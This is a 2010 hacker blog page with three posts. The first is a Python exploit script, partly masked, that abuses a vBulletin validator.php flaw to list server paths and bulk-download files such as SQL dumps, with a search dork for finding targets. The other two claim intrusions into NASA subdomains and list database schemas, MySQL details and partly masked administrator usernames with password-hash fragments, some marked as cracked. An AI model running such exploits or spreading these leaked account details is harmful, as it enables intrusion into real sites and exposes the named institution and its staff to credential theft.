TinKode-vBulletin Full Disclosure [Python]

vBulletin Full Disclosure [Python]

Posted by isrtinkode on February 19, 2010

#! /usr/bin/env python3.1
#
################################################################
#                ____        _ _      _   _ (validator.php)    #
#               |  _ \      | | |    | | (_)                   #
#         __   _| |_) |_   _| | | ___| |_ _ _ __               #
#         \ \ / /  _ <| | | | | |/ _ \ __| | '_ \              #
#          \ V /| |_) | |_| | | |  __/ |_| | | | |             #
#           \_/ |____/ \__,_|_|_|\___|\__|_|_| |_|             #
#                                   @expl0it...                #
################################################################
#       [ vBulletin Files / Directories Full Disclosure ]      #
#    [ Vuln discovered by TinKode / xpl0it written by cmiN ]   #
#           [ Greetz: insecurity.ro, darkc0de.com ]            #
################################################################
#                                                              #
#                  Special thanks for: cmiN                    #
#                  www.TinKode.BayWords.com                    #
################################################################

#! /usr/bin/env python3.1 # ################################################################ # ____ _ _ _ _ (validator.php) # # | _ \ | | | | | (_) # # __ _| |_) |_ _| | | ___| |_ _ _ __ # # \ \ / / _ <| | | | | |/ _ \ __| | '_ \ # # \ V /| |_) | |_| | | | __/ |_| | | | | # # \_/ |____/ \__,_|_|_|\___|\__|_|_| |_| # # @expl0it... # ################################################################ # [ vBulletin Files / Directories Full Disclosure ] # # [ Vuln discovered by TinKode / xpl0it written by cmiN ] # # [ Greetz: insecurity.ro, darkc0de.com ] # ################################################################ # # # Special thanks for: cmiN # # www.TinKode.BayWords.com # ################################################################ import os, sys, urllib.request, urllib.parse, threading def main(): logo = """ \t |---------------------------------------------------------------| \t | ____ _ _ _ _ (TM) | \t | | _ \ | | | | | (_) | \t | __ _| |_) |_ _| | | ___| |_ _ _ __ | \t | \ \ / / _ <| | | | | |/ _ \ __| | '_ \ | \t | \ V /| |_) | |_| | | | __/ |_| | | | | | \t | \_/ |____/ \__,_|_|_|\___|\__|_|_| |_| | \t | | \t | vBulletin Full Disclosure expl0it | \t | Written by cmiN | \t | Vulnerability discovered by TinKode | \t | | \t | Dork: intext:"Powered by vBulletin" | \t | Visit: www.insecurity.ro & www.darkc0de.com | \t |---------------------------------------------------------------| """ usage = """ |---------------------------------------------------------------| |Usage: vbfd.py scan http://www.site.com/vB_folder | | vbfd.py download *.sql -> all | | vbfd.py download name.jpg -> one | |---------------------------------------------------------------|""" if sys.platform in ("linux", "linux2"): clearing = "clear" else: clearing = "cls" os.system(clearing) print(logo) args = sys.argv if len(args) == 3: try: print("Please wait...") if args[1] == "scan": extract_parse_save(********)) elif args[1] == "********": download_data(********) except Exception as message: print("An error occurred: {}".********) except: print("Unknown error.") else: print(********) else: print(usage) input() def extract_parse_save(url): print("[+]********...") hurl = url + "/validator.php" with urllib.request.******** as usock: source = ********() print("[+]Finding ********") word = "validate('" source = source[source******** + len(word):] value = ********] print("[+]Obtaining paths...") hurl = url + "/validator********(value) with urllib.request.urlopen(hurl) as usock: lastk, lastv = None, None dictionary = dict() for line in usock: line = ********() index = ********") if index != -1: lastk = line[index ********(" ") index = line.find("********") if index != -1: lastv = line********) if lastk != None and lastv != None: index = ********) if index in (-1, 0): lastk = "********) else: lastk = "[{}] {}".format(********) dictionary[lastk] = lastv lastk, lastv = None, None print("[+]Organizing and saving paths...") with open(********) as fout: fout.********) keys = sorted(dictionary.keys()) for key in keys: fout.write********(key, dictionary[key])) def download_data(files): print("[+]Searching and downloading files...") ******** = 50 with open("********) as fin: url = fin.readline(********) if files.find******** hurl = url + ********) Download(hurl).start() else: ext = files[files.********] for line in fin: pieces = line********) if pieces[0].******** upath = pieces[1] hurl = ********) while threading.active_********) > ******** pass Download(********).start() while threading.********) > 1: pass class Download(********): def __init__(self, url): threading.Thread.__********) self.url = ******** def run(********): try: with urllib.request.urlopen(self.url) as usock: data = ********() uparser = urllib.parse.urlparse(********) pieces = ********.********) fname = pieces[********] with open(********) as fout: ********.write(data) except: pass ********"__main__": main()

You need python 3.1 to work!

Read More

TinKode-NASA 2 Websites Full Access

NASA 2 Websites Full Access

Posted by isrtinkode on February 19, 2010

 _   _
| \ | | __ _ ___  __ _
|  \| |/ _` / __|/ _` |
| |\  | (_| \__ \ (_| |
|_| \_|\__,_|___/\__,_|

      #owned by c0de.breaker

I had access to:

www.istd.gsfc.nasa.gov
www.sed.gsfc.nasa.gov

Some screens:

http://i44.tinypic.com/vnjl10.png

http://i41.tinypic.com/25j9zle.png

http://i37.tinypic.com/294t26t.png

http://i35.tinypic.com/qnpf9y.png

http://i38.tinypic.com/23r5mw.png

http://i37.tinypic.com/2rfe92u.png

http://i35.tinypic.com/a57s5e.png

Informations:

#Version: 5.0.41-community-nt-log
#User: **********.gsfc.nasa.gov
#Principal Database: *****

Tables from “*****” database:

#access
#branch
#docs
#docsbranch
#intro
#programs

Columns from “access” table:

#Id
#firstName
#lastName
#userName
#userID
#passWd
#projAdmin
#branchAdmin
#userAdmin
#userEmail
#deleteFlag
#dateCreated
#dateExp

Admins Accounts:

http://www.istd.gsfc.nasa.gov
[1]c****n:****2b550647
[2]c****n:****457ee5exxx = pass
[3]c****n:****14414xxx
[4]am****s:****df47xxx
[5]m****a:****b668859ca = demo
[6]pm****es:****b668859ca = demo
[7]hb****h:****b410747xxx
[8]rb****rut:****b410747xxx
[9]bw****r:****f299589xxx
[10]j****on:****dc4acc0xxx
[11]j****s:****c4acc0xxx
[12]l****ia:****4746f1dxxx
[13]g****w:****33e5ba3axxx
[14]j****le:****ff639f44xxx
[15]d****k:****0cf29958xxx
[16]A****s:****42fa7cxxx

http://www.sed.gsfc.nasa.gov
[17]l****y:****c17889xxx
[18]k****m:****9040104xxx
[19]j****ch:****dc4acc0xxx
[20]c****rmann:****027e9a6xxx
[21]rw****ey:****d42fa7cxxx
[22]y****e:****6107b5cxxx
[23]s****n:****cf29958xxx
[24]b****i:****dd3b569xxx
[25]lr****y:****410747xxx
[26]e****l:****bf05750xxx
[27]cd****ka:****bb79660xxx
[29]j****es:****e4746f1xxx
[30]r****z:****d75fb3exxx
[31]t****ley:****90f14657de5 = d41d8cd9
[32]e****ks:****d75fb3exxx
[33]ph****es:****6e3e050xxx
[34]pp****an:****0877c779xxx
[35]ac****n:****5eb1a0fexxx

I didn’t want to damage anything. Only to show that nasa subdomains have many SQLI, XSS, vulnerabilities etc

#Finish, c0de.breaker

Read More

TinKode-NASA Full-Disclosure! AGAIN

NASA Full-Disclosure! AGAIN

Posted by isrtinkode on February 19, 2010

 _   _                      _               _
| \ | | __ _ ___  __ _     / \   __ _  __ _(_)_ __
|  \| |/ _` / __|/ _` |   / _ \ / _` |/ _` | | '_ \
| |\  | (_| \__ \ (_| |  / ___ \ (_| | (_| | | | | |
|_| \_|\__,_|___/\__,_| /_/   \_\__, |\__,_|_|_| |_|
                                |___/

              #Full Disclosure... c0de.breaker

#Important
Ok. First of all, the reason I made this SQLi public ( even though I had no intention to make this ) , is because I found out that somebody else discovered the vulnerable parameter.I found this SQLi 3 months ago.
# Why do I test websites?
Because it is my hobby , and I want to prove that even the big websites, which should be highly secured, can be hacked. This is the reality , and it makes me sad.I feeling alright about what I’m doing, because if anyone finds a vulnerability before me , he/she could use it in harmful ways such as: shelling , rooting , backdooring , deleting etc

The WebSite Vulnerable: http://saif-1.larc.nasa.gov (CEOS Systems Analysis Database)

Testing:

Informations:

#Version: 5.1.31-community
#User: *******
#Main Database: *******
#Path of MySQL: C:\Documents and Settings\All Users\Application Data\MySQL\MySQL Server 5.1\Data\

Also, the magic_quotes_gpc=OFF, and “user” from mysql have all privileges:

Bad…

Other Databases:

#ceossadb
#information_schema
#mysql
#ceosvis

Tables from “ceosvis” database:

#instrument
#takes
#measurement
#contains
#mission

Tables from main Database:

#agency
#alt_names
#cat_measurements
#cat_missions
#cat_series
#cat_wavebands
#ceosdbversion
#constellations
#data_access_links
#db_update_phases
#ecv
#instr
#instr_agencies
#instr_desc
#instr_geometry
#instr_maturity
#instr_mission
#instr_res_swath_temp
#instr_sampling
#instr_status
#instr_status_biz
#instr_technology
#instr_technology_rawdata
#instr_type
#instr_waveband
#mappedor1
#measurement_confidence
#measurement_desc
#measurement_type
#measurementtypesconfidencepilot
#measurementtypespending
#method
#mission_agencies
#mission_status
#missions
#obs_requirments
#orbit_sense
#orbit_type
#requirements
#series
#series_agency
#series_missions
#societal_benefits
#sys_diagrams
#taxonomy
#typeatmosphere
#typereqapplication
#typerequirementsource
#typesmeasurementsconfidencepilot
#wmo_measurement

I made this public, because I saw the website down, and I think the administrators will fix the vulnerability once someone reports the problem. (sorry because i didn’t make this first, if was that)

Read More